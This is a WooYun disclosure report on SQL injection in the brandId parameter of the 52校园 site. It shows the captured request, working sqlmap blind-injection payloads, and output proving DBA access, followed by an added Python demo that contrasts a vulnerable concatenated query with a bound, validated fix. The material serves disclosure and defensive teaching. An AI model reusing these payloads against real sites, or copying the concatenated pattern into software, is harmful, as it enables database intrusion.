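Vulnerability summary

Bug ID: wooyun-2015-0159728

Title: SQL injection on the 52校园 main site (DBA privileges)

Vendor: 52校园

Author: 路人甲

Submitted: 2015-12-10 19:59

Fixed: 2016-01-23 15:16

Disclosed: 2016-01-23 15:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor could not be reached or actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]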


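Vulnerability details

Disclosure status:

2015-12-10: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2016-01-23: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

As the title says.

Detailed description: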

www.xiaoyuan52.com


GET /ServiceProductDetailServlet?aid=234&brandId= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.xiaoyuan52.com/
Cookie: JSESSIONID=A0BB8836496506E48280E2FD1FF9A6FB; Hm_lvt_02a7e8de3462731a4306808d32ba6624=1449568247; Hm_lpvt_02a7e8de3462731a4306808d32ba6624=1449568247; Hm_lvt_9cb8846b548404438c81aaa02eda4f0f=1449569305,1449569323,1449569337,1449569460; Hm_lpvt_9cb8846b548404438c81aaa02eda4f0f=1449569460; __utma=46112941.752146213.1449568247.1449568247.1449568247.1; __utmb=46112941.4.10.1449568247; __utmc=46112941; __utmz=46112941.1449568247.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); Hm_lvt_1007db9ceeef283a9034565ae4ded9ea=1449568780,1449568809,1449569056,1449569545; Hm_lpvt_1007db9ceeef283a9034565ae4ded9ea=1449569545; __c_sesslist_45193=e9tugjszlg_cy1; __c_pv_45193=6; __c_session_45193=1449568247477812; __c_today_45193=1; __c_review_45193=0; __c_last_45193=1449568247477; __c_visitor=1449568247477812; __c_session_at_45193=1449569463396; HMACCOUNT=73DDED9F0E84E15A; __cs_visitor=1449568247477812; __cs_skey=43cbwd; cokShengId=cb824cad61d045f0a038f4d96100c6b1; cokShiId=df1ede907d8b4753bfe3dd5150e0d63f; cokSchoolId=1773; Hm_lvt_cc0a85323aaa033084fa9bde21f127e9=1449569243; Hm_lpvt_cc0a85323aaa033084fa9bde21f127e9=1449569243; Hm_lvt_fdfea51f5530d9b1730875677c8b0ca8=1449569245; Hm_lpvt_fdfea51f5530d9b1730875677c8b0ca8=1449569245; Hm_lvt_3be674bc521868af0b6a4f4abe42f5e1=1449569247,1449569275; Hm_lpvt_3be674bc521868af0b6a4f4abe42f5e1=1449569275; __utmv=; opcid=1449569277183_1253895130; opsid=1449569277183_1095337246; oppt=oneplus; opsct=1449569277184; opbct=1449569277184; opnt=1449569277184; opstep=1; optime_browser=1449569277183; opstep_event=0; opnt_event=1449569277184; Hm_lvt_927e53b3ef9848d0b2b347b67f64cd59=1449569324,1449569330,1449569460; Hm_lpvt_927e53b3ef9848d0b2b347b67f64cd59=1449569460; __utmt=1; BAIDUID=B6FA785FD29ADA1C8E56E87A07518F28:FG=1
Host: www.xiaoyuan52.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


The brandId parameter is injectable.

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: brandId (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: aid=234&brandId=-8286' OR 8471=8471 AND 'yVwZ'='yVwZ
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: aid=234&brandId=-1' OR 4578=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'mzvK'='mzvK
---
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
current database: 'P2Psite'
current user is DBA: True
available databases [8]:
[*] master
[*] model
[*] msdb
[*] p2p
[*] P2Psite
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

Proof of vulnerability:

Fix:
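
An added example, not part of the original report or the vendor's code: the boolean-based payload from the sqlmap output above, run against a concatenated query and against a bound, validated one. SQLite stands in for the SQL Server back end, and the table, column and function names are hypothetical, as is the choice to treat an empty brandId as "no brand filter".

```python
import re
import sqlite3

# Payload string copied from the sqlmap output in this report.
REPORTED_PAYLOAD = "-8286' OR 8471=8471 AND 'yVwZ'='yVwZ"

def make_db():
    """Constructed sample data; table and column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product (id INTEGER, aid INTEGER, brand_id TEXT)")
    db.executemany("INSERT INTO product VALUES (?, ?, ?)",
                   [(1, 234, "7"), (2, 234, "9"), (3, 500, "7")])
    return db

def lookup_concatenated(db, aid, brand_id):
    """Flawed pattern: request values are pasted into the SQL text."""
    sql = ("SELECT id FROM product WHERE aid = " + str(aid) +
           " AND brand_id = '" + brand_id + "'")
    return [row[0] for row in db.execute(sql)]

def lookup_bound_only(db, aid, brand_id):
    """Binding alone: the payload is compared as an ordinary string."""
    sql = "SELECT id FROM product WHERE aid = ? AND brand_id = ?"
    return [row[0] for row in db.execute(sql, (int(aid), brand_id))]

def lookup_parameterized(db, aid, brand_id):
    """Fix: reject malformed ids early, then bind every value."""
    if brand_id and not re.fullmatch(r"[0-9]{1,9}", brand_id):
        raise ValueError("brandId must be numeric")
    sql, params = "SELECT id FROM product WHERE aid = ?", [int(aid)]
    if brand_id:  # the captured request sends brandId empty (assumed: no filter)
        sql += " AND brand_id = ?"
        params.append(brand_id)
    return [row[0] for row in db.execute(sql, params)]

if __name__ == "__main__":
    db = make_db()
    print("concatenated, normal id :", lookup_concatenated(db, 234, "7"))
    print("concatenated, payload   :", lookup_concatenated(db, 234, REPORTED_PAYLOAD))
    print("bound only, payload     :", lookup_bound_only(db, 234, REPORTED_PAYLOAD))
    try:
        lookup_parameterized(db, 234, REPORTED_PAYLOAD)
    except ValueError as exc:
        print("validated, payload      : rejected,", exc)
```

Separately from the query fix, the sqlmap output shows the application connecting as 'sa' with DBA rights; a dedicated low-privilege login limits what any remaining injection can reach.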

Copyright notice: please credit the source 路人甲@乌云 when reposting


Vulnerability response

Vendor response:

Vendor could not be reached or actively declined